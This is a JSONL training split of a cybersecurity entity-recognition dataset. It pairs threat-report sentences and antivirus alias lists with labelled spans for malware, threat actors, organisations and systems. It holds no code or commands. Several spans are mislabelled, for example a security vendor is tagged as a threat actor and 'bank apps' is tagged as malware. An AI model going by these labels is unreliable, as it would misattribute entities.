{"text": "The software masqueraded as a confidential document and was intended to infect a Windows computer.", "spans": {"SYSTEM: software": [[4, 12]], "SYSTEM: Windows computer.": [[81, 98]]}, "info": {"id": "cyner2_train_006039", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Proxy.Delf.C Trojan-Proxy/W32.Steredir.524288 Trojan/Proxy.Steredir.a TROJ_PROXY.ARF Backdoor.Trojan.Client TROJ_PROXY.ARF Win.Trojan.Proxy-467 Trojan.Proxy.Delf.C Trojan-Proxy.Win32.Steredir.a Trojan.Proxy.Delf.C Trojan.Win32.Steredir.dqbk Trojan.Win32.Proxy.524288 Troj.Proxy.W32.Steredir.a!c Trojan.Proxy.Delf.C TrojWare.Win32.TrojanProxy.Delf.C Trojan.Proxy.Delf.C BackDoor.StealthRedir.20 W32/Risk.HXFA-2912 TrojanProxy.Steredir.m TR/Proxy.Steredir.A.2 Trojan.Proxy.Delf.C Trojan-Proxy.Win32.Steredir.a TrojanProxy:Win32/Delf.C Backdoor.RAT.StealthRedirector.V2.0 TrojanProxy.Steredir Win32/TrojanProxy.Delf.C Win32.Trojan-proxy.Steredir.Eawz Trojan.PR.Steredir!IftwXs0S3T4 W32/Delf.A!tr Win32/Trojan.Proxy.118", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006041", "source": "cyner2_train"}}
{"text": "These attempts differed from other tactics seen by us elsewhere, such as those connected to Iran, with better attention paid to the operation of the campaign.", "spans": {"THREAT_ACTOR: the operation of the campaign.": [[128, 158]]}, "info": {"id": "cyner2_train_006043", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Dropper.Dinwod.Win32.1277 Trojan.Zusy.D217BF Win32.Trojan.Delf.iv Trojan.Win32.Dinwod.dqohqi Trojan.MulDrop6.4509 Trojan[Dropper]/Win32.Dinwod Trojan:Win32/Walinlog.A TrojanDropper.Dinwod Win32/Delf.SRU Trojan.DR.Dinwod!WCRzCOHRNbg Win32/Trojan.c58", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006045", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Swisyn!O Trojan.Swisyn W32/Backdoor.KUPO-4695 TROJ_SWISYN.KK Trojan.Win32.Swisyn.cbuq Troj.W32.Swisyn!c Win32.Trojan.Swisyn.Lrsk Trojan.MulDrop3.21821 Trojan.Swisyn.Win32.23323 TROJ_SWISYN.KK Trojan.Win32.Swisyn W32/Backdoor2.HJRU Trojan/Swisyn.vuq Trojan/Win32.Swisyn Trojan.Win32.A.Swisyn.35840.B[UPX] Trojan.Win32.Swisyn.cbuq TrojanDropper:Win32/Bolardoc.A Trojan/Win32.Swisyn.R43544 Trojan.Swisyn Win32/VB.ODF Trojan.Swisyn!Pk7uhYgClNU W32/Swisyn.CBUQ!tr Win32/Trojan.Dropper.c9f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006047", "source": "cyner2_train"}}
{"text": "The adversary had also conducted attacks using Daserf malware in the past, and Symantec refers to them as Tick in their report", "spans": {"THREAT_ACTOR: The adversary": [[0, 13]], "MALWARE: Daserf malware": [[47, 61]], "ORGANIZATION: Symantec": [[79, 87]], "MALWARE: Tick": [[106, 110]]}, "info": {"id": "cyner2_train_006049", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.DB9B Spyware.OnlineGames W32/Palevo.eszc Riskware.Win32.Lime.cukpjv HV_PALEVO_CA2255B5.TOMC W32.Worm.Palevo-187 Worm.P2P.Palevo!qwzmy5h6XK0 Worm.Win32.A.P2P-Palevo.2637834[h] Win32.HLLW.Lime.2579 Worm.Palevo.Win32.83875 BehavesLike.Win32.Trojan.vc Worm/Palevo.cubr Worm[P2P]/Win32.Palevo Trojan.Kazy.D1020 Worm/Win32.Palevo Worm.Palevo P2P-Worm.Win32.Palevo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006050", "source": "cyner2_train"}}
{"text": "Malicious programs of this family request administrator rights and then make themselves invisible in the list of installed apps.", "spans": {}, "info": {"id": "cyner2_train_006052", "source": "cyner2_train"}}
{"text": "RSA Research investigated the source of suspicious, observed beaconing", "spans": {"ORGANIZATION: RSA Research": [[0, 12]]}, "info": {"id": "cyner2_train_006053", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Enemany.A@mm Worm/W32.Alcaul.9728.C W32.Enemany.A.int Enemany.A Win32/Enemany.A!intended WORM_ENEMANY.A Email-Worm.Win32.Alcaul.r Win32.Enemany.A@mm I-Worm.Enemany!xtYbjkEFnbQ Win32.Enemany.A@mm Worm.Win32.Enemany.A Win32.Enemany.A@mm Worm.Alcaul.Win32.145 WORM_ENEMANY.A W32/Risk.ZRGC-4282 Worm.Alcaul.r.kcloud Worm:Win32/Enmny.A I-Worm.Win32.Enemany.A[h] Win32/Enemany.worm.9728 Win32.Enemany.A@mm Worm.Win32.Alcaul.am Win32/Enemany.A Email-Worm.Win32.Alcaul W32/Alcaul.R!worm W32/Enemany.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006054", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanSpy.Hakey.FC.1702 TSPY_HAKEY.SM MSIL.Trojan-Spy.Keylogger.a Backdoor.Trojan Win32/SillyAutorun.FJI TSPY_HAKEY.SM Trojan.Win32.Win32.dcdhel W32/Application.ZMXW-2371 TrojanSpy:MSIL/Hakey.A MSIL/Spy.Keylogger.DY Trojan-Dropper.MSIL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006055", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9914 Trojan-Ransom.Win32.Birele.aisl Win32.Trojan.Birele.Wtxf Trojan.MulDrop6.10288 Trojan-Ransom.Win32.Birele.aisl Trojan-Ransom.Win32.Foreign", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006057", "source": "cyner2_train"}}
{"text": "Moreover, the presence of intrusion software does not necessarily equate to its misuse, as such software may be utilized by intelligence or law enforcement agencies in a manner that conforms with rule of law and democratic principles.", "spans": {}, "info": {"id": "cyner2_train_006058", "source": "cyner2_train"}}
{"text": "What is the scope of Chrysaor ? Chrysaor was never available in Google Play and had a very low volume of installs outside of Google Play .", "spans": {"MALWARE: Chrysaor": [[21, 29], [32, 40]], "SYSTEM: Google Play": [[64, 75], [125, 136]]}, "info": {"id": "cyner2_train_006059", "source": "cyner2_train"}}
{"text": "This is significant, because it indicates a potential shift in the motives of this adversary.", "spans": {}, "info": {"id": "cyner2_train_006060", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/Inject.knu Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win.Trojan.Inject-4540 Trojan.Win32.Donbot.ctdhoe Trojan.Win32.Z.Inject.646633 BackDoor.Donbot.2 Backdoor.Inject.Win32.2858 BehavesLike.Win32.PWSZbot.jc Backdoor/Inject.cpw TR/Donbot.hjsmv Trojan/Win32.Invader Win32.Troj.Undef.kcloud Trojan:Win32/Donbot.A Backdoor/Win32.Trojan.R78442 Backdoor.Inject Win32.Trojan.Spnr.Pijv Backdoor.Inject!WaCQ7k+5qK0 Win32/Trojan.BO.cc2", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006062", "source": "cyner2_train"}}
{"text": "The original name given to the encryptor by its creator is not known; other security vendors detect it as Trojan.Encoder.858, Ransom:Win32/Troldesh.", "spans": {"MALWARE: encryptor": [[31, 40]], "THREAT_ACTOR: creator": [[48, 55]]}, "info": {"id": "cyner2_train_006064", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.JaydarkE.Trojan Win32.Runouce.B@mm Virus.Worm.Win32.Runouce.1!O W32.Runouce.B Win32.Runouce.B@mm W32.W.Runouce.lk4E W32/Chir.b.dannado Win32.Runouce.E2C45E W32.Chir.B@mm Win32/Chir.B WORM_CHIR.DI Win.Worm.Brontok-88 Win32.Virus.Chir.A Win32.Runouce.B@mm Virus.Win32.Runouce.bxafx Win32.Chir.B Win32.Runouce.B@mm Win32.Runonce.6652 WORM_CHIR.DI BehavesLike.Win32.Virut.nh Email-Worm.Win32.Runouce Win32/cnPeace.b W32/Chir.I Worm[Email]/Win32.Runouce.b Worm.NimdaT.d.18848 Trojan:JS/Nimda.A Win32/ChiHack.6652 W32/Chir.b@MM Virus.Win32.Chur.A Win32/Chir.B Worm.Win32.Runouce.a I-Worm.Chir.B Win32/Trojan.1a7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006067", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Sality.PE Win32.Sality.3 Virus/W32.Sality.D Worm.Dumpy.S19687 Win32.Sality.3 Virus.Sality.Win32.25 Win32.Sality.3 Win32.Sality.3 W32.Sality.AE Win32/Sality.AA PE_SALITY.RL Trojan-Ransom.Win32.Blocker.gfeq Virus.Win32.Sality.beygb Win32.Sality.3 Win32.Sality.3 Win32.Sector.30 BehavesLike.Win32.Sality.cm Win32/HLLP.Kuku.poly2 W32/Sality.AT Worm:Win32/Dumpy.B Trojan-Ransom.Win32.Blocker.gfeq Win32.Virus.Sality.A HEUR/Fakon.mwf Virus.Win32.Sality.bakc Worm.AutoRun W32/Sality.AA Win32.Sality Win32/Sality.NBA Trojan-Ransom.Win32.Blocker.b Win32.Sality.BL Worm.Win32.Dumpy Virus.Win32.Sality.I", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006069", "source": "cyner2_train"}}
{"text": "This all started with the great analysis and blog done by RSA in August 2017 about a phishing wave targeting Russian Banks.", "spans": {"ORGANIZATION: RSA": [[58, 61]], "ORGANIZATION: Russian Banks.": [[109, 123]]}, "info": {"id": "cyner2_train_006073", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9717 Trojan.Win32.Zbot.dsnigs Trojan.Reconyc.Win32.16630 TrojanSpy.Zbot.ewlp", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006075", "source": "cyner2_train"}}
{"text": "The emails come with an attached Microsoft Word document file.", "spans": {"SYSTEM: Microsoft Word": [[33, 47]]}, "info": {"id": "cyner2_train_006076", "source": "cyner2_train"}}
{"text": "During our monitoring of activities around the APT28 threat group, McAfee Advanced Threat Research analysts identified a malicious Word document that appears to leverage the Microsoft Office Dynamic Data Exchange DDE technique that has been previously reported by Advanced Threat Research.", "spans": {"THREAT_ACTOR: the APT28 threat group, McAfee Advanced Threat Research": [[43, 98]], "SYSTEM: the Microsoft Office Dynamic Data Exchange DDE": [[170, 216]], "ORGANIZATION: Advanced Threat Research.": [[264, 289]]}, "info": {"id": "cyner2_train_006077", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Webprefix!O Trojan.Webprefix.B3 Trojan.Webprefix.Win32.30550 Trojan/Webprefix.agl Win32.Trojan.Webprefix.d Trojan.Farfli Win32/Webprefix.F Trojan-Downloader.Win32.Klevate.bv Trojan.Win32.Webprefix.balbkt Troj.W32.Webprefix.agl!c Trojan.Win32.Krypttik.a Trojan.Webprefix.13 BehavesLike.Win32.Trojan.ch Trojan/Webprefix.w W32.Trojan.Webprefix Trojan[Packed]/Win32.Katusha Trojan:Win32/Webprefix.B Trojan.Win32.A.Webprefix.128000.B Trojan-Downloader.Win32.Klevate.bv Packed/Win32.Katusha.R3725 Trojan.Webprefix.01 Trojan.Webprefix!EZ6BvH+ekbw Packer.Win32.Katusha", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006080", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Constructor.MS04-032.b Riskware.Win32.MS04-032.hrwi W32/Trojan.NOKE-5825 Trojan.Moo Constructor.Win32.MS04-032.b Exploit.MS04-032.B Constructor.Win32.MS04-032.b Tool.MS04.Win32.28 W32/TrojanX.IRQ Constructor.MS04-032.d KIT/MS04-032.B W32/MS04_032.B!kit HackTool[Constructor]/Win32.MS04-032 Constructor.W32.MS04-032.b!c Constructor/Xema.36864 Trojan:Win32/Shelcod.A Constructor.MS04032 VirTool.Win32.MS04 Constructor.AMN Trojan.Win32.MS04-032.b Win32/Constructor.990", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006086", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.BO2K.1.1.2.plugin Backdoor.BO2K.1.1.2.plugin Backdoor/Orifice2K.plugin Win32.Trojan.WisdomEyes.16070401.9500.9851 W32/Risk.JQIA-3547 Backdoor.BO2K.1.1.2.plugin Backdoor.Win32.BO2K.112.plugin Backdoor.BO2K.1.1.2.plugin Trojan.Win32.BO2K-112.guih Win32.Backdoor.Bo2k.Edxg Backdoor.BO2K.1.1.2.plugin Backdoor.Win32.BO2K.112.plugin Backdoor.BO2K.1.1.2.plugin BackDoor.BO2k.plugin Backdoor.BO2K.Win32.168 Backdoor/BO2K.112.Plugin BDS/Bo2k.112.plugin.3 Trojan[Backdoor]/Win32.BO2K Backdoor.BO2K.1.1.2.plugin Backdoor.Win32.BO2K.112.plugin Backdoor:Win32/BO2K.1_12 Backdoor.BO2K.112 Win32/BO2K.112.plugin Backdoor.BO2K.plugin!QCV0kLCiRV0 Trojan.Win32.BO2K", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006087", "source": "cyner2_train"}}
{"text": "In late August 2015, Symantec identified a previously unknown back door Trojan Backdoor.Dripion infecting organizations primarily located in Taiwan, as well as Brazil and the United States.", "spans": {"ORGANIZATION: Symantec": [[21, 29]], "MALWARE: unknown back door Trojan": [[54, 78]], "ORGANIZATION: organizations": [[106, 119]]}, "info": {"id": "cyner2_train_006090", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Rakhni Downloader.Rakhni.Win32.344 Trojan-Downloader.Win32.Rakhni.moc TrojanDownloader.Rakhni.hu TR/Dldr.Delf.ltfzo TrojanDownloader:Win32/Docdobex.A Trojan.Zusy.D3FCFF Trojan-Downloader.Win32.Rakhni.moc Downloader/Win32.Rakhni.C2136522 TrojanDownloader.Rakhni W32/Delf.CDW!tr.bdr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006091", "source": "cyner2_train"}}
{"text": "Malware mostly communicating with compromised domains", "spans": {"MALWARE: Malware": [[0, 7]]}, "info": {"id": "cyner2_train_006094", "source": "cyner2_train"}}
{"text": "Programs of this family interfere with bank apps, such as the Commerzbank app or Google Play.", "spans": {"MALWARE: Programs": [[0, 8]], "MALWARE: family": [[17, 23]], "MALWARE: bank apps,": [[39, 49]], "SYSTEM: Commerzbank app": [[62, 77]], "SYSTEM: Google Play.": [[81, 93]]}, "info": {"id": "cyner2_train_006098", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.VB Trojan/VB.pra Trojan.Kazy.D61DA Win32.Trojan.WisdomEyes.16070401.9500.9965 W32.SillyFDC Win32/Tnega.AEVL Trojan.Win32.VB.aspi Trojan.Win32.VB.eijsbx Trojan.Win32.A.VB.40960.AS Troj.W32.Vb!c Trojan.VB.Win32.100469 BehavesLike.Win32.Vilsel.pz Trojan/VB.ckmo Trojan:Win32/Tazi.A Trojan.Win32.VB.aspi HEUR/Fakon.mwf Trojan.VB Worm.AutoRun Win32/VB.PRA Win32.Trojan.Vb.Ljka Trojan.VB!n6riGwYVvNo Trojan.Win32.VB W32/SillyFDC.IZ!tr Win32/Trojan.db1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006099", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom/W32.WannaCry.5267459 Ransom.WannaCrypt.S1670344 Ransom.WannaCrypt Trojan/Exploit.CVE-2017-0147.a Ransom_WCRY.SMALYM Win32.Worm.Rbot.a Ransom.Wannacry Ransom_WCRY.SMALYM Win.Ransomware.WannaCry-6313787-0 Win32.Exploit.CVE-2017-0147.A Trojan-Ransom.Win32.Wanna.m Trojan.Win32.Wanna.epxkni Trojan.Win32.WannaCry.5267459 Troj.Ransom.W32.Wanna.toP0 Trojan.Encoder.11432 Exploit.CVE.Win32.1765 BehavesLike.Win32.RansomWannaCry.th Trojan.Wanna.k Trojan[Ransom]/Win32.Wanna Ransom:Win32/WannaCrypt.A!rsm Trojan-Ransom.Win32.Wanna.m Trojan/Win32.WannaCryptor.R200894 Hoax.Wanna Trj/GdSda.A Win32/Exploit.CVE-2017-0147.A Trojan-Ransom.Win32.Wanna.m Exploit.CVE-2017-0147! Trojan.Win32.Exploit W32/WannaCryptor.H!tr.ransom", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006100", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packer.FSG.A Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Downloader.BFIA Downloader.Trojan TROJ_APHER.A Win.Trojan.Small-10534 Packer.FSG.A Trojan-Downloader.Win32.WebDown.10 Packer.FSG.A Trojan.Win32.WebDown.cdwvkr Packer.FSG.A TrojWare.Win32.TrojanDownloader.Apher.0700 Packer.FSG.A Trojan.DownLoader.4572 TROJ_APHER.A Trojan-Downloader.Win32.WebDown W32/Downloader.MUZI-7025 Trojan/Downloader.WebDown.10 Trojan/Win32.Unknown Packer.FSG.A Trojan-Downloader.Win32.WebDown.10 Win-Trojan/Apher.1312 Packer.FSG.A Trj/Downloader.GE Win32/Randon.A W32/Dloader.AE!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006101", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.D.EED80 Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.Bayrob.etejdt BehavesLike.Win32.Ipamor.jc Trojan/Win32.Scar.C59481 Trojan.Win32.Woripecs W32/Scar.CTI!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006102", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Small.14336.BM Trojan.Zenshirsh.SL7 Backdoor.Small.Win32.3772 Backdoor/Small.wn BKDR_RINCUX.AD Trojan.Win32.Scar.nzec Backdoor.Win32.Small.32768.H[UPX] Backdoor.W32.Small.wn!c Trojan.DownLoad3.19355 BKDR_RINCUX.AD BehavesLike.Win32.Backdoor.lm BDS/Salamdom.A Trojan.Win32.Scar.nzec Backdoor:Win32/Salamdom.A Adware/AdHelper.B Win32/Salamdom.AA Win32.Backdoor.Small.Sxyt Backdoor.Small!t0Kn4UZH16w Trojan-Downloader.Win32.Pangu W32/ServStart.AS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006103", "source": "cyner2_train"}}
{"text": "Our analysis confirms the excellent investigative work done by TALOS and expands on what they found.", "spans": {}, "info": {"id": "cyner2_train_006108", "source": "cyner2_train"}}
{"text": "TABLE OF CONTENTS Key Findings Introduction Threat Analysis Fakespy Code Analysis Dynamic Library Loading Stealing Sensitive Information Anti-Emulator Techniques Under Active Development Who is Behind Fakespy 's Smishing Campaigns ? Conclusions Cybereason Mobile Detects and Stops FakeSpy Indicators of Compromise INTRODUCTION For the past several weeks , Cybereason has been investigating a new version of Android malware dubbed FakeSpy , which was first identified in October 2017 and reported again in October 2018 .", "spans": {"MALWARE: Fakespy": [[60, 67], [201, 208]], "ORGANIZATION: Cybereason Mobile": [[245, 262]], "MALWARE: FakeSpy": [[281, 288], [430, 437]], "ORGANIZATION: Cybereason": [[356, 366]], "SYSTEM: Android": [[407, 414]]}, "info": {"id": "cyner2_train_006109", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Joke/W32.ArchSMS.2449920.C Trojan.Zusy.D14269 Win32.Trojan.WisdomEyes.16070401.9500.9992 not-a-virus:WebToolbar.Win32.Webatla.b Trojan.Win32.ArchSMS.csnmld Trojan.SMSSend.4975 Tool.ArchSMS.Win32.17120 BehavesLike.Win32.BadFile.vc Trojan:Win32/Blinerarch.A Trojan/Win32.ArchSMS.C198920 Hoax.ArchSMS Trojan.ArchSMS!HGAxbs185b0 Hoax.Win32.ArchSMS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006111", "source": "cyner2_train"}}
{"text": "Over the course of their campaigns, we analyzed their modus operandi and dissected their tools of the trade—and uncovered common denominators indicating that PLEAD, Shrouded Crossbow, and Waterbear may actually be operated by the same group.", "spans": {"THREAT_ACTOR: campaigns,": [[25, 35]], "MALWARE: PLEAD, Shrouded Crossbow,": [[158, 183]], "MALWARE: Waterbear": [[188, 197]], "ORGANIZATION: the same group.": [[226, 241]]}, "info": {"id": "cyner2_train_006112", "source": "cyner2_train"}}
{"text": "Hancitor is one of the better-known malware downloaders due to its numerous SPAM runs and evolving delivery technique.", "spans": {"MALWARE: Hancitor": [[0, 8]], "MALWARE: malware downloaders": [[36, 55]]}, "info": {"id": "cyner2_train_006114", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FantibagB.Trojan Email-Worm.Win32.Bagle!O Win32.Trojan.WisdomEyes.16070401.9500.9958 Win32/Fantibag.E Email-Worm.Win32.Bagle.cv Email-Worm.Win32.Bagle Worm/Bagle.aac TR/Bagle.BR.A.Dll I-Worm.Win32.Bagle.FA Email-Worm.Win32.Bagle.cv Trojan:Win32/Fantibag.B Win32/Bagle.BI Trojan.Fantibag.A1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006116", "source": "cyner2_train"}}
{"text": "It is meant solely to empty the safe of ATMs. We detect this new malware family as BKDR_ALICE.A.", "spans": {"MALWARE: malware": [[65, 72]]}, "info": {"id": "cyner2_train_006117", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dropper.Refroso.B Trojan/W32.Refroso.62976.D Trojan.Win32.Refroso!O Trojan.Injector.5265 Trojan.Refroso.Win32.766 Trojan/Refroso.dzt Trojan.Dropper.Refroso.B Win32.Trojan.WisdomEyes.16070401.9500.9997 TROJ_LETHIC.SMA Trojan.Win32.Refroso.ayz Trojan.Dropper.Refroso.B Trojan.Win32.Refroso.bwzzc Trojan.Dropper.Refroso.B Trojan.Dropper.Refroso.B BackDoor.Bifrost.26171 TROJ_LETHIC.SMA BehavesLike.Win32.Downloader.kc Backdoor/Poison.bhw Worm:Win32/Refroso.A Trojan[Downloader]/Win32.Refroso Win32.Troj.Refroso.kcloud Worm:Win32/Refroso.A Backdoor.Win32.Poison.46632 Trojan.Dropper.Refroso.B Trojan/Win32.Refroso.R694 Trojan.Dropper.Refroso.B Trojan.Win32.Buzus.8101325 Trojan.Refroso Trojan.Win32.Buzus W32/Injector.IA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006118", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPSW.LdPinch.cds PWS-Lineage.dll Trojan.Downloader-35380 Trojan-GameThief.Win32.OnLineGames.stab Trojan.PWS.Wsgame.origin PWS:Win32/Kotwir.A.dll Trojan-Downloader.Win32.Banload.aqi", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006119", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Blocker.194764 Trojan.Bepush.Win32.889 Trojan.Strictor.D7317 TROJ_SPNR.11GF13 Win32.Trojan.WisdomEyes.16070401.9500.9800 TROJ_SPNR.11GF13 Win.Trojan.Truado-1 Trojan.Win32.Dapato.dcitdy Trojan-Downloader:W32/Kilim.T Trojan.DownLoader9.41166 Trojan.JS.FBExt W32/Trojan.CAKN-6742 Trojan/Blocker.eyy TR/Dldr.Truado.B.5 TrojanDownloader:MSIL/Truado.B Trojan/Win32.Blocker.R77853 Hoax.Blocker Trj/CI.A Trojan.Blocker!Jm7NxUGe2as Win32/Trojan.a10", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006121", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.PWS.LdPinch.TMK Trojan-PWS/W32.LdPinch.557056 Trojan.PWS.LdPinch.TMK Trojan.PWS.LdPinch.TMK Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Pakes.nkj Trojan.PWS.LdPinch.TMK Trojan.Win32.Pakes.gkhlc Trojan.PWS.LdPinch.TMK Trojan.PWS.LdPinch.TMK BehavesLike.Win32.VirRansom.hc Trojan.PWS.LdPinch.TMK Trojan.DR.Jeshex!G2i88bn5YEw W32/LdPinch.TNV!tr.pws Win32/Trojan.PWS.912", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006122", "source": "cyner2_train"}}
{"text": "A backdoor also known as: BehavesLike.Win32.BadFile.nm TrojanDownloader:Win32/Xuwuq.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006124", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W64.HfsAutoA.4EC7 Exploit.CVE-2015-1701.A Trojan.Win64 Exploit.CVE-2015-1701.A W64/Trojan.CBXE-7834 Exploit.CVE-2015-1701.A Exploit.Win64.CVE-2015-1701.b Exploit.CVE-2015-1701.A Exploit.CVE-2015-1701.A Exploit.CVE2015-1701.1 BehavesLike.Win64.BadFile.mh Virus.Win32.Virut Exploit.CVE-2015-1701.e Trojan[Exploit]/EXE.CVE-2015-1701 Exploit.CVE-2015-1701.A Exploit.Win64.CVE.tnlV Exploit.Win64.CVE-2015-1701.b Trojan/Win32.Exploit.R200799 Exploit.Win64.CVE-2015-1701 Trj/CI.A Win64.Exploit.Cve-2015-1701.Ahyf W64/CVE_2015_1701.A!tr Win32/Trojan.Exploit.059", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006129", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Cult.fvly W32/Cult.B@mm W32.HLLW.Cult@mm Win32/Cult.E Email-Worm.Win32.Cult.b Win32.Cult.B@mm I-Worm.Cult.B Worm.Win32.Cult.B Win32.HLLW.SpyBot I-Worm/Cult.b Worm.Cult.b.kcloud Worm:Win32/Cult.D@mm I-Worm.Win32.Cult.16418 Win32/Cult.worm.16418 Win32.Cult.B@mm W32/Cult.B@mm Worm.Cult Net-Worm.Cult Win32/Cult.B Worm.Cults.b Email-Worm.Win32.Cult W32/Cult.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006131", "source": "cyner2_train"}}
{"text": "Last week, an Endgame researcher was analyzing spam emails for indications of emergent malicious activity.", "spans": {"ORGANIZATION: Endgame researcher": [[14, 32]]}, "info": {"id": "cyner2_train_006132", "source": "cyner2_train"}}
{"text": "Symantec is currently investigating reports of yet another new attack in the Middle East involving the destructive disk-wiping malware used by the Shamoon group W32.Disttrack, W32.Disttrack.B.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "MALWARE: destructive disk-wiping malware": [[103, 134]], "THREAT_ACTOR: Shamoon group": [[147, 160]]}, "info": {"id": "cyner2_train_006133", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnlineGamesXTUG.Worm Trojan-PSW.Win32.QQShou!O Trojan/PSW.QQShou.aqt Trojan.Win32.QQShou.evyqv TROJ_AGKT.SMUS6 Trojan.Qqshou-23 Trojan-PSW.Win32.QQShou.pfp Trojan.PWS.QQShou!WQNr+ttAX9g Trojan.Win32.PSWQQShou.80480[h] Troj.PSW32.W.QQShou.aqt!c Trojan.QQShou.Win32.1230 TROJ_AGKT.SMUS6 BehavesLike.Win32.Autorun.lc Trojan/PSW.QQShou.adz W32/VB.NII!tr Trojan[PSW]/Win32.QQShou Trojan.Graftor.D33E1 Trojan/Win32.QQShou PWS:Win32/QQpass.DW Win32/QQPass.NVO TrojanPSW.QQShou Win32.Trojan-qqpass.Qqrob.Hwwq Trojan-PWS.Qqshou Trojan.Win32.VB.NII", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006134", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Rootkit.9056.H Win32.Trojan.WisdomEyes.16070401.9500.9999 Hacktool.Rootkit Win32/Rookuz.S Trojan.Win32.Hmir.bczend Trojan.NtRootKit.13456 Downloader.Hmir.Win32.3829 Backdoor.Winnt Trojan[Downloader]/Win32.Hmir Troj.GameThief.W32.OnLineGames.kZeW Backdoor:WinNT/Blazgel.A Trojan/Win32.Rootkit.R24603 TrojanDownloader.Hmir Win32/RootKit.Rootkit.03f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006135", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.BD3E", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006136", "source": "cyner2_train"}}
{"text": "Symantec first began looking into this threat in the fall of 2013.", "spans": {"ORGANIZATION: Symantec": [[0, 8]]}, "info": {"id": "cyner2_train_006137", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.A.Downloader.39936.EG Trojan.DownLoad2.31494 W32/Trojan.BMBV-5898 TR/Vodvit.A.10 Trojan:Win32/Vodvit.A Trojan.Graftor.D79FB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006139", "source": "cyner2_train"}}
